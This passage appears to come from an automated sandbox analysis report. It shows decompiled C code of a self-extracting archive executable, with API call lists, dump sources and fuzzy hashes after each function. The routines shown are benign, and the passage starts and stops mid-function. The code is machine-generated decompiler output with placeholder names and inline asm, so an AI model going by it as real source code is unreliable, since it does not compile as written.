    				signed int _t75;
    				void* _t81;
    
    				_t81 = __eflags;
    				_v8 = E00858571(__ebx, __ecx, __edx);
    				E0085A82C(__ebx, __ecx, __edx, _t81);
    				_t31 = E0085A4A1(_t81, _a4);
    				_v16 = _t31;
    				_t57 =  *(_v8 + 0x48);
    				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
    					return 0;
    				}
    				_push(__ebx);
    				_t70 = E00857B00(_t57, 0x220);
    				_t51 = __ebx | 0xffffffff;
    				__eflags = _t70;
    				if(__eflags == 0) {
    					L5:
    					_t75 = _t51;
    					goto L6;
    				} else {
    					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
    					 *_t70 =  *_t70 & 0x00000000; // executed
    					_t36 = E0085A8CE(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
    					_t75 = _t36;
    					__eflags = _t75 - _t51;
    					if(_t75 != _t51) {
    						__eflags = _a8;
    						if(_a8 == 0) {
    							E008578BD();
    						}
    						asm("lock xadd [eax], ebx");
    						__eflags = _t51 == 1;
    						if(_t51 == 1) {
    							_t45 = _v8;
    							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x86db20;
    							if( *((intOrPtr*)(_t45 + 0x48)) != 0x86db20) {
    								E00857AC6( *((intOrPtr*)(_t45 + 0x48)));
    							}
    						}
    						 *_t70 = 1;
    						_t64 = _t70;
    						_t70 = 0;
    						 *(_v8 + 0x48) = _t64;
    						_t40 = _v8;
    						__eflags =  *(_t40 + 0x350) & 0x00000002;
    						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
    							__eflags =  *0x86dda0 & 0x00000001;
    							if(( *0x86dda0 & 0x00000001) == 0) {
    								_v16 =  &_v8;
    								E0085A377(5,  &_v16);
    								__eflags = _a8;
    								if(_a8 != 0) {
    									_t44 =  *0x86dd40; // 0x5b22e8
    									 *0x86d814 = _t44;
    								}
    							}
    						}
    						L6:
    						E00857AC6(_t70);
    						return _t75;
    					} else {
    						 *((intOrPtr*)(E00857F42())) = 0x16;
    						goto L5;
    					}
    				}
    			}


















    0x0085a70d
    0x0085a71a
    0x0085a71d
    0x0085a725
    0x0085a72e
    0x0085a731
    0x0085a737
    0x00000000
    0x0085a739
    0x0085a73d
    0x0085a74a
    0x0085a74c
    0x0085a750
    0x0085a752
    0x0085a782
    0x0085a782
    0x00000000
    0x0085a754
    0x0085a761
    0x0085a767
    0x0085a76a
    0x0085a76f
    0x0085a773
    0x0085a775
    0x0085a794
    0x0085a798
    0x0085a79a
    0x0085a79a
    0x0085a7a5
    0x0085a7a9
    0x0085a7aa
    0x0085a7ac
    0x0085a7af
    0x0085a7b6
    0x0085a7bb
    0x0085a7c0
    0x0085a7b6
    0x0085a7c1
    0x0085a7c7
    0x0085a7cc
    0x0085a7ce
    0x0085a7d1
    0x0085a7d4
    0x0085a7db
    0x0085a7dd
    0x0085a7e4
    0x0085a7e9
    0x0085a7f2
    0x0085a7f7
    0x0085a7fd
    0x0085a7ff
    0x0085a804
    0x0085a804
    0x0085a7fd
    0x0085a7e4
    0x0085a784
    0x0085a785
    0x00000000
    0x0085a777
    0x0085a77c
    0x00000000
    0x0085a77c
    0x0085a775

    APIs
      • Part of subcall function 00858571: GetLastError.KERNEL32(?,008700E0,008533F4,008700E0,?,?,00852E6F,?,?,008700E0), ref: 00858575
      • Part of subcall function 00858571: _free.LIBCMT ref: 008585A8
      • Part of subcall function 00858571: SetLastError.KERNEL32(00000000,?,008700E0), ref: 008585E9
      • Part of subcall function 00858571: _abort.LIBCMT ref: 008585EF
      • Part of subcall function 0085A82C: _abort.LIBCMT ref: 0085A85E
      • Part of subcall function 0085A82C: _free.LIBCMT ref: 0085A892
      • Part of subcall function 0085A4A1: GetOEMCP.KERNEL32(00000000,?,?,0085A72A,?), ref: 0085A4CC
    • _free.LIBCMT ref: 0085A785
    • _free.LIBCMT ref: 0085A7BB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorLast_abort
    • String ID: "[$"[
    • API String ID: 2991157371-1714955112
    • Opcode ID: f6c16f9be93e3988a8ecce0ea6c3aee6a1123b920c40a451aa1888b46ed3728f
    • Instruction ID: 11f0e120f8d096de5f0abf43cc5fe50ef2911b66ff69b37f17893b097566a9b9
    • Opcode Fuzzy Hash: f6c16f9be93e3988a8ecce0ea6c3aee6a1123b920c40a451aa1888b46ed3728f
    • Instruction Fuzzy Hash: 36310731904204AFDB14EB68D480BAD7BF5FF44322F2542A9ED14DB291DB715D08CB52
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00849AA5(long _a4) {
    				short _v164;
    				long _t5;
    				long _t6;
    				WCHAR* _t9;
    				long _t11;
    
    				_t11 = _a4;
    				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
    				if(_t5 != 0) {
    					_t9 = L"EDIT";
    					_t5 = E00841438( &_v164, _t9);
    					if(_t5 != 0) {
    						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
    						_t11 = _t5;
    					}
    				}
    				if(_t11 != 0) {
    					_t6 = SHAutoComplete(_t11, 0x10); // executed
    					return _t6;
    				}
    				return _t5;
    			}








    0x00849ab5
    0x00849abc
    0x00849ac4
    0x00849ac7
    0x00849ad4
    0x00849adb
    0x00849ae3
    0x00849ae9
    0x00849ae9
    0x00849aeb
    0x00849aee
    0x00849af3
    0x00000000
    0x00849af3
    0x00849afd

    APIs
    • GetClassNameW.USER32(?,?,00000050), ref: 00849ABC
    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00849AF3
      • Part of subcall function 00841438: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0083ADA2,?,?,?,0083AD51,?,-00000002,?,00000000,?), ref: 0084144E
    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00849AE3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AutoClassCompareCompleteFindNameStringWindow
    • String ID: EDIT
    • API String ID: 4243998846-3080729518
    • Opcode ID: 294822f8e902e5b59e1c59deba56770ff6509e613eff33acb5b7006743e4b5a7
    • Instruction ID: c6ee2514eb0e327d7df1c95937a806f74a10269d9a095c77e0d2c38eabb94000
    • Opcode Fuzzy Hash: 294822f8e902e5b59e1c59deba56770ff6509e613eff33acb5b7006743e4b5a7
    • Instruction Fuzzy Hash: 35F05E32B4132C6BDB30D6599C09F9B766CEB46B11F450156FE40E2180DAA4994186F6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 25%
    			E00849B13(intOrPtr* __ecx) {
    				char _v8;
    				intOrPtr _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v32;
    				intOrPtr _t10;
    
    				_t10 = E0083FD16(L"riched20.dll"); // executed
    				 *__ecx = _t10;
    				 *0x86dffc(0); // executed
    				_v16 = 8;
    				_v12 = 0x7ff;
    				 *0x86deb4( &_v16);
    				_v32 = 1;
    				_v28 = 0;
    				_v24 = 0;
    				_v20 = 0;
    				L0084D874(); // executed
    				 *0x86df08(0x8775c0,  &_v8,  &_v32, 0); // executed
    				return __ecx;
    			}











    0x00849b22
    0x00849b29
    0x00849b2c
    0x00849b35
    0x00849b3d
    0x00849b44
    0x00849b4e
    0x00849b59
    0x00849b5d
    0x00849b60
    0x00849b63
    0x00849b6d
    0x00849b7a

    APIs
      • Part of subcall function 0083FD16: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0083FD31
      • Part of subcall function 0083FD16: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083E82C,Crypt32.dll,?,0083E8AE,?,0083E892,?,?,?,?), ref: 0083FD53
    • OleInitialize.OLE32(00000000), ref: 00849B2C
    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00849B63
    • SHGetMalloc.SHELL32(008775C0), ref: 00849B6D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
    • String ID: riched20.dll
    • API String ID: 3498096277-3360196438
    • Opcode ID: 590a193fedca860242f6dfce9182194fcedac2359bf0161dfc50a8dfd22759b8
    • Instruction ID: d00d3a8d4f526415e785e1c117c51311efdf039a0f6e7cd8849443868a817a63
    • Opcode Fuzzy Hash: 590a193fedca860242f6dfce9182194fcedac2359bf0161dfc50a8dfd22759b8
    • Instruction Fuzzy Hash: ACF0F9B1D00209ABCB10AF99D849AEFFBFCFF94705F00416AE815E2241DBB856058BA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 66%
    			E0084C8E7(void* __eflags, WCHAR* _a4) {
    				char _v8196;
    				int _t7;
    				WCHAR* _t12;
    				void* _t14;
    
    				_t14 = __eflags;
    				E0084D9C0();
    				SetEnvironmentVariableW(L"sfxcmd", _a4); // executed
    				_t7 = E0083F86B(_t14, _a4,  &_v8196, 0x1000);
    				_t12 = _t7;
    				if(_t12 != 0) {
    					_push( *_t12 & 0x0000ffff);
    					while(E0083F982() != 0) {
    						_t12 =  &(_t12[1]);
    						__eflags = _t12;
    						_push( *_t12 & 0x0000ffff);
    					}
    					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
    				}
    				return _t7;
    			}







    0x0084c8e7
    0x0084c8ef
    0x0084c8fd
    0x0084c912
    0x0084c917
    0x0084c91b
    0x0084c920
    0x0084c92a
    0x0084c923
    0x0084c923
    0x0084c929
    0x0084c929
    0x0084c939
    0x0084c939
    0x0084c943

    APIs
    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0084C8FD
    • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0084C939
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: EnvironmentVariable
    • String ID: sfxcmd$sfxpar
    • API String ID: 1431749950-3493335439
    • Opcode ID: 18146ee6f76ddfdd73334f46859712631dcd87401044b3ab0ea981e450546179
    • Instruction ID: 5f2a2f1ed1106b653047577e41aab1a5f7820b78a1f760bdb88730e7133a1c8d
    • Opcode Fuzzy Hash: 18146ee6f76ddfdd73334f46859712631dcd87401044b3ab0ea981e450546179
    • Instruction Fuzzy Hash: 64F0A772905228B6C7212F98DC09BAABF5CFF09B41F0104A5FE89D6242DB645D41C6E1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			E008396E2(void* __ecx, void* _a4, long _a8) {
    				long _v8;
    				int _t14;
    				signed int _t15;
    				void* _t25;
    
    				_push(__ecx);
    				_t25 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
    					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
    				}
    				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
    				if(_t14 != 0) {
    					_t15 = _v8;
    				} else {
    					_t16 = E008397E9(_t25);
    					if(_t16 == 0) {
    						L7:
    						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
    							L10:
    							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
    								L14:
    								_t15 = _t16 | 0xffffffff;
    							} else {
    								_t16 = GetLastError();
    								if(_t16 != 0x21) {
    									goto L14;
    								} else {
    									_push(0x8000);
    									goto L6;
    								}
    							}
    						} else {
    							_t16 = GetLastError();
    							if(_t16 != 0x6d) {
    								goto L10;
    							} else {
    								_t15 = 0;
    							}
    						}
    					} else {
    						_t16 = 0x4e20;
    						if(_a8 <= 0x4e20) {
    							goto L7;
    						} else {
    							_push(0x4e20);
    							L6:
    							_push(_a4);
    							_t15 = E008396E2(_t25);
    						}
    					}
    				}
    				return _t15;
    			}







    0x008396e5
    0x008396e8
    0x008396ee
    0x008396f8
    0x008396f8
    0x0083970a
    0x00839712
    0x0083976e
    0x00839714
    0x00839716
    0x0083971d
    0x00839736
    0x0083973a
    0x0083974b
    0x0083974f
    0x00839769
    0x00839769
    0x0083975b
    0x0083975b
    0x00839764
    0x00000000
    0x00839766
    0x00839766
    0x00000000
    0x00839766
    0x00839764
    0x0083973c
    0x0083973c
    0x00839745
    0x00000000
    0x00839747
    0x00839747
    0x00839747
    0x00839745
    0x0083971f
    0x0083971f
    0x00839727
    0x00000000
    0x00839729
    0x00839729
    0x0083972a
    0x0083972a
    0x0083972f
    0x0083972f
    0x00839727
    0x0083971d
    0x00839776

    APIs
    • GetStdHandle.KERNEL32(000000F6), ref: 008396F2
    • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 0083970A
    • GetLastError.KERNEL32 ref: 0083973C
    • GetLastError.KERNEL32 ref: 0083975B
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorLast$FileHandleRead
    • String ID:
    • API String ID: 2244327787-0
    • Opcode ID: e9c58a6b80c5a9206caad2218c4d31f4d3dbead675d51e0925b2586e6b8ad298
    • Instruction ID: dedfa2504d336e0bb857c1840feac7c116c4b43aa4358ee3d1197b1ad0984118
    • Opcode Fuzzy Hash: e9c58a6b80c5a9206caad2218c4d31f4d3dbead675d51e0925b2586e6b8ad298
    • Instruction Fuzzy Hash: EB11AC34924609EBDF206F65C944A7A77ADFB91360F10C52AF8AAC51D0D7B48C40CBD2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00859A87(signed int _a4) {
    				signed int _t9;
    				void* _t10;
    				void* _t13;
    				signed int _t15;
    				WCHAR* _t22;
    				signed int _t24;
    				signed int* _t25;
    				void* _t27;
    
    				_t9 = _a4;
    				_t25 = 0x890768 + _t9 * 4;
    				_t24 =  *_t25;
    				if(_t24 == 0) {
    					_t22 =  *(0x865ba0 + _t9 * 4);
    					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
    					_t27 = _t10;
    					if(_t27 != 0) {
    						L8:
    						 *_t25 = _t27;
    						if( *_t25 != 0) {
    							FreeLibrary(_t27);
    						}
    						_t13 = _t27;
    						L11:
    						return _t13;
    					}
    					_t15 = GetLastError();
    					if(_t15 != 0x57) {
    						_t27 = 0;
    					} else {
    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
    						_t27 = _t15;
    					}
    					if(_t27 != 0) {
    						goto L8;
    					} else {
    						 *_t25 = _t15 | 0xffffffff;
    						_t13 = 0;
    						goto L11;
    					}
    				}
    				_t4 = _t24 + 1; // 0x14325216
    				asm("sbb eax, eax");
    				return  ~_t4 & _t24;
    			}











    0x00859a8c
    0x00859a90
    0x00859a97
    0x00859a9b
    0x00859aa9
    0x00859ab9
    0x00859abf
    0x00859ac3
    0x00859aec
    0x00859aee
    0x00859af2
    0x00859af5
    0x00859af5
    0x00859afb
    0x00859afd
    0x00000000
    0x00859afe
    0x00859ac5
    0x00859ace
    0x00859add
    0x00859ad0
    0x00859ad3
    0x00859ad9
    0x00859ad9
    0x00859ae1
    0x00000000
    0x00859ae3
    0x00859ae6
    0x00859ae8
    0x00000000
    0x00859ae8
    0x00859ae1
    0x00859a9d
    0x00859aa2
    0x00000000

    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00852E6F,00000000,00000000,?,00859A2E,00852E6F,00000000,00000000,00000000,?,00859C2B,00000006,FlsSetValue), ref: 00859AB9
    • GetLastError.KERNEL32(?,00859A2E,00852E6F,00000000,00000000,00000000,?,00859C2B,00000006,FlsSetValue,00866058,00866060,00000000,00000364,?,00858643), ref: 00859AC5
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00859A2E,00852E6F,00000000,00000000,00000000,?,00859C2B,00000006,FlsSetValue,00866058,00866060,00000000), ref: 00859AD3
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID:
    • API String ID: 3177248105-0
    • Opcode ID: 99850ddefeeb4613ea3f8a6f7ac012035d5b0338b8d912328e35778b23e6a6ae
    • Instruction ID: aafd4c6c9c98cdde3fb9649e9b72b2a9f0c73931f1e2410c2470b29384330070
    • Opcode Fuzzy Hash: 99850ddefeeb4613ea3f8a6f7ac012035d5b0338b8d912328e35778b23e6a6ae
    • Instruction Fuzzy Hash: E201A736615636EBCB228A69AC44A577B9CFF057B2B210661FD86D7180D760DC05C6F0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0084A3FB() {
    				struct tagMSG _v32;
    				int _t6;
    				long _t12;
    
    				_t6 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
    				if(_t6 != 0) {
    					GetMessageW( &_v32, 0, 0, 0);
    					TranslateMessage( &_v32);
    					_t12 = DispatchMessageW( &_v32); // executed
    					return _t12;
    				}
    				return _t6;
    			}






    0x0084a40c
    0x0084a414
    0x0084a41d
    0x0084a427
    0x0084a431
    0x00000000
    0x0084a431
    0x0084a43b

    APIs
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0084A40C
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084A41D
    • TranslateMessage.USER32(?), ref: 0084A427
    • DispatchMessageW.USER32(?), ref: 0084A431
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Message$DispatchPeekTranslate
    • String ID:
    • API String ID: 4217535847-0
    • Opcode ID: d068dd70ab40820be42d4a0f7695ad9ee3b818ece0cc8c9f08c095c784037127
    • Instruction ID: 5221974ab5ecbb3d141cbddfda07cc4baa77e16c1fcfb794d6c6d49f85dbaa73
    • Opcode Fuzzy Hash: d068dd70ab40820be42d4a0f7695ad9ee3b818ece0cc8c9f08c095c784037127
    • Instruction Fuzzy Hash: 59E0ED71E0222EA78B20ABE6AC0CCDF7F6CFE062A17015411F50ED2000DAA89105C7F0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E0084050F() {
    				long _v4;
    				void* __ecx;
    				void* __esi;
    				void* __ebp;
    				void* _t5;
    				void* _t7;
    				int _t8;
    				void* _t12;
    				void** _t18;
    				void* _t22;
    
    				_t12 = 0;
    				if( *0x8700e0 > 0) {
    					_t18 = 0x8700e4;
    					do {
    						_t7 = CreateThread(0, 0x10000, E00840649, 0x8700e0, 0,  &_v4); // executed
    						_t22 = _t7;
    						if(_t22 == 0) {
    							_push(L"CreateThread failed");
    							_push(0x8700e0);
    							E00836DE3(E0084E76A(E00836DE8(0x8700e0)), 0x8700e0, 0x8700e0, 2);
    						}
    						 *_t18 = _t22;
    						 *0x00870164 =  *((intOrPtr*)(0x870164)) + 1;
    						_t8 =  *0x877368; // 0x0
    						if(_t8 != 0) {
    							_t8 = SetThreadPriority( *_t18, _t8);
    						}
    						_t12 = _t12 + 1;
    						_t18 =  &(_t18[1]);
    					} while (_t12 <  *0x8700e0);
    					return _t8;
    				}
    				return _t5;
    			}













    0x00840514
    0x00840518
    0x0084051c
    0x0084051f
    0x00840533
    0x00840539
    0x0084053d
    0x0084053f
    0x00840544
    0x00840561
    0x00840561
    0x00840566
    0x00840568
    0x0084056e
    0x00840575
    0x0084057a
    0x0084057a
    0x00840580
    0x00840581
    0x00840584
    0x00000000
    0x00840589
    0x0084058d

    APIs
    • CreateThread.KERNELBASE ref: 00840533
    • SetThreadPriority.KERNEL32(?,00000000), ref: 0084057A
      • Part of subcall function 00836DE8: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00836E06
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Thread$CreatePriority__vswprintf_c_l
    • String ID: CreateThread failed
    • API String ID: 2655393344-3849766595
    • Opcode ID: 17398438598dc231dd39ccb1fd6cf01b4f896e34aff221de7ebcb7c21a6c1177
    • Instruction ID: 14b9cc8ac9265c3e925c29cfc6bbfba828a66a579034cb35469082ee4ec0bcb5
    • Opcode Fuzzy Hash: 17398438598dc231dd39ccb1fd6cf01b4f896e34aff221de7ebcb7c21a6c1177
    • Instruction Fuzzy Hash: E101D6B2348709ABD2246E689C41B677358FB40761F11402DFB96E6280DAB1A854CE71
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E0083DA8B(int _a4) {
    				signed int _t4;
    				int _t9;
    				void* _t13;
    				signed int _t14;
    				signed int _t15;
    				WCHAR* _t17;
    
    				_t4 =  *0x874128; // 0x6
    				_t5 = _t4 + 1;
    				asm("sbb esi, esi");
    				_t15 = _t14 & _t4 + 0x00000001;
    				 *0x874128 = _t15;
    				_t17 = (_t15 << 0xb) + 0x870128;
    				 *_t17 = 0;
    				if(E0083CF62(0x870078, _t13, _t5 - 8, _a4, _t17, 0x400, 0, 0) == 0) {
    					_t9 = LoadStringW( *0x870060, _a4, _t17, 0x400); // executed
    					if(_t9 == 0) {
    						LoadStringW( *0x870064, _a4, _t17, 0x400);
    					}
    				}
    				return _t17;
    			}









    0x0083da8b
    0x0083da97
    0x0083daa0
    0x0083daa2
    0x0083daa7
    0x0083dab2
    0x0083dabd
    0x0083dac7
    0x0083dad5
    0x0083dadd
    0x0083daeb
    0x0083daeb
    0x0083dadd
    0x0083daf5

    APIs
    • LoadStringW.USER32(?,?,00000400,00000000), ref: 0083DAD5
    • LoadStringW.USER32(?,?,00000400), ref: 0083DAEB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: LoadString
    • String ID: 0Z
    • API String ID: 2948472770-3845847589
    • Opcode ID: 1bc5ed28ad2ecce7ba4476da33233d05169f767655cca3e027f911f146634f8b
    • Instruction ID: fed69f940d5c72a06c0ec8d967dcc3b18ad8ac49d901a12a7182185763b1345a
    • Opcode Fuzzy Hash: 1bc5ed28ad2ecce7ba4476da33233d05169f767655cca3e027f911f146634f8b
    • Instruction Fuzzy Hash: B5F0B476A00220BFDB209F60AC48D577E9DFB597A1B015025FE49E2120D735CC94CBB1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00839CD8(intOrPtr* __ecx, void* __edx, void* _a4, long _a8) {
    				void* __ebp;
    				int _t24;
    				long _t32;
    				void* _t36;
    				void* _t42;
    				void* _t52;
    				intOrPtr* _t53;
    				void* _t57;
    				intOrPtr _t58;
    				long _t59;
    
    				_t52 = __edx;
    				_t59 = _a8;
    				_t53 = __ecx;
    				if(_t59 != 0) {
    					if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
    						 *(_t53 + 4) = GetStdHandle(0xfffffff5);
    					}
    					while(1) {
    						_a8 = _a8 & 0x00000000;
    						_t42 = 0;
    						if( *((intOrPtr*)(_t53 + 0xc)) == 0) {
    							goto L12;
    						}
    						_t57 = 0;
    						if(_t59 == 0) {
    							L14:
    							if( *((char*)(_t53 + 0x14)) == 0 ||  *((intOrPtr*)(_t53 + 0xc)) != 0) {
    								L21:
    								 *((char*)(_t53 + 8)) = 1;
    								return _t42;
    							} else {
    								_t56 = _t53 + 0x1e;
    								if(E00836D6F(0x8700e0, _t53 + 0x1e, 0) == 0) {
    									E00836FB0(0x8700e0, _t59, 0, _t56);
    									goto L21;
    								}
    								if(_a8 < _t59 && _a8 > 0) {
    									_t58 =  *_t53;
    									_t36 =  *((intOrPtr*)(_t58 + 0x14))(0);
    									asm("sbb edx, 0x0");
    									 *((intOrPtr*)(_t58 + 0x10))(_t36 - _a8, _t52);
    								}
    								continue;
    							}
    						} else {
    							goto L7;
    						}
    						while(1) {
    							L7:
    							_t32 = _t59 - _t57;
    							if(_t32 >= 0x4000) {
    								_t32 = 0x4000;
    							}
    							_t10 = WriteFile( *(_t53 + 4), _a4 + _t57, _t32,  &_a8, 0) - 1; // -1
    							asm("sbb bl, bl");
    							_t42 =  ~_t10 + 1;
    							if(_t42 == 0) {
    								goto L14;
    							}
    							_t57 = _t57 + 0x4000;
    							if(_t57 < _t59) {
    								continue;
    							}
    							L13:
    							if(_t42 != 0) {
    								goto L21;
    							}
    							goto L14;
    						}
    						goto L14;
    						L12:
    						_t24 = WriteFile( *(_t53 + 4), _a4, _t59,  &_a8, 0); // executed
    						asm("sbb al, al");
    						_t42 =  ~(_t24 - 1) + 1;
    						goto L13;
    					}
    				}
    				return 1;
    			}













    0x00839cd8
    0x00839cd9
    0x00839cde
    0x00839ce2
    0x00839cef
    0x00839cf9
    0x00839cf9
    0x00839cfe
    0x00839cfe
    0x00839d03
    0x00839d09
    0x00000000
    0x00000000
    0x00839d0b
    0x00839d0f
    0x00839d73
    0x00839d77
    0x00839dd1
    0x00839dd4
    0x00000000
    0x00839d7f
    0x00839d81
    0x00839d91
    0x00839dcc
    0x00000000
    0x00839dcc
